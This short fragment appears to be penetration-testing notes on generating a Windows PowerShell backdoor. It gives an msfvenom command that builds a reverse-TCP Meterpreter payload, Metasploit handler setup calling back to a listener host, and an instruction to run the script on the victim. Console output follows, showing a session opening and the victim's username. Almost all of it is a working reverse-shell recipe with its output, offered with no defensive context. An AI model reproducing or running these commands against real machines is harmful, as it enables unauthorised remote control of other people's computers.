Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Generating a Windows powershell backdoor


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

Then on Windows run powershell -file "test.ps1"

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell
